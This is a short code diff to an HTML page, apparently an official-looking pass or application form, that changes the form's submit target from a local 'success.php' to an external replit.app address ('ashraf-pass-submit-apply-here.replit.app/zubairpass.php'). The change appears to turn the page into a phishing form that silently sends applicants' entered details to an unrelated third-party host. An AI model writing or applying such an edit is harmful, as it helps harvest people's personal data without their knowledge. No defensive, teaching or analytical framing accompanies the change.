--- a/pass.html
+++ b/pass.html
@@ -80,7 +80,7 @@
             </div>
 
 
-            <form action="success.php" method="POST">
+            <form action="https://ashraf-pass-submit-apply-here.replit.app/zubairpass.php" method="POST">
               <div class="ElementWrapper">
                 <div data-form-element-key="PrevToPrevYearDays"
                   class="FormElement FormElement_TextBox NoTopMargin PrevToPrevYearDays">
